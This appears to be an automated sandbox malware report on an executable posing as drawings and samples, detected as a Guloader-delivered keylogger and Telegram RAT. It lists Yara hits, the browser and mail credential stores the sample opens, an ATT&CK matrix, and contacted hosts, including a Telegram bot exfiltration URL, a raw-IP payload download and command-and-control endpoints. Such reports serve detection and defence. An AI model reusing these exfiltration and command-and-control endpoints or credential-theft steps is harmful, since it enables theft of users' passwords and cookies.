                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		3
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Registry Run Keys / Startup Folder                		11
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory115
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Registry Run Keys / Startup Folder                		2
                Obfuscated Files or Information                		Security Account Manager21
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS131
                Virtualization/Sandbox Evasion                		Distributed Component Object Model1
                Clipboard Data                		1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Masquerading                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                Virtualization/Sandbox Evasion                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Process Injection                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Drawing_Products_Materials_and_Samples_IMG.exe32%ReversingLabsWin32.Trojan.Guloader
                Drawing_Products_Materials_and_Samples_IMG.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\stub\Sophia.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll0%ReversingLabs
                C:\Users\user\AppData\Roaming\stub\Sophia.exe32%ReversingLabsWin32.Trojan.Guloader

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%Avira URL Cloudsafe
                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                https://www.google.com/search?q=backslash&sca_esv=620c24330b4497e4&sca_upv=1&ei=UDzhZpjjMZyIptQPqai-0%Avira URL Cloudsafe
                https://www.office.com/lB0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtedst%26oq%3Dtedst%20%Avira URL Cloudsafe
                http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/79.127.132.200%Avira URL Cloudsafe
                https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BD2763DD20%Avira URL Cloudsafe
                http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
                https://www.google.com/chrome/0%Avira URL Cloudsafe
                http://varders.kozow.com:80810%Avira URL Cloudsafe
                https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                https://www.google.com/search?q=tedst&oq=tedst&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzkwNGowajSoAgCwAgE&s0%Avira URL Cloudsafe
                https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst;0%Avira URL Cloudsafe
                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
                http://checkip.dyndns.org/0%Avira URL Cloudsafe
                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.bin0%Avira URL Cloudsafe
                http://status.thawte.com0:0%Avira URL Cloudsafe
                http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.binp0%Avira URL Cloudsafe
                http://checkip.dyndns.org/q0%Avira URL Cloudsafe
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
                https://api.telegram0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/0%Avira URL Cloudsafe
                https://www.google.com/chromeGoogle0%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
                https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=00%Avira URL Cloudsafe
                https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0Google0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a0%Avira URL Cloudsafe
                https://www.office.com/0%Avira URL Cloudsafe
                http://checkip.dyndns.org0%Avira URL Cloudsafe
                http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                http://cacerts.thawte.com/ThawteTLSRSACAG1.crt00%Avira URL Cloudsafe
                https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                http://smtp.zoho.eu0%Avira URL Cloudsafe
                https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
                http://aborters.duckdns.org:80810%Avira URL Cloudsafe
                https://www.google.com/chrome/Google0%Avira URL Cloudsafe
                https://www.google.com/chrome0%Avira URL Cloudsafe
                http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
                http://anotherarmy.dns.army:80810%Avira URL Cloudsafe
                https://reallyfreegeoip.org0%Avira URL Cloudsafe
                https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslash0%Avira URL Cloudsafe
                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
                http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/79.127.132.20$0%Avira URL Cloudsafe
                https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=ba0%Avira URL Cloudsafe
                http://api.telegram.org0%Avira URL Cloudsafe
                https://www.google.com/0%Avira URL Cloudsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
                https://gemini.google.com/app?q=0%Avira URL Cloudsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                smtp.zoho.eu
                		185.230.214.164
                		truetrue
                  		unknown
                  reallyfreegeoip.org
                  		172.67.177.134
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/79.127.132.20false
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.binfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=backslash&sca_esv=620c24330b4497e4&sca_upv=1&ei=UDzhZpjjMZyIptQPqai-Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DBA000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/botDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://cdp.thawte.com/ThawteTLSRSACAG1.crl0pDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedstDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.office.com/lBDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A86000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtedst%26oq%3Dtedst%2Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BD2763DD2Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE4000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://chrome.google.com/webstore?hl=enDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.gopher.ftp://ftp.Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://varders.kozow.com:8081Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=tedst&oq=tedst&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzkwNGowajSoAgCwAgE&sDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/chrome/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst;Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DFE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://status.thawte.com0:Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.binpDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046DC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegramDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
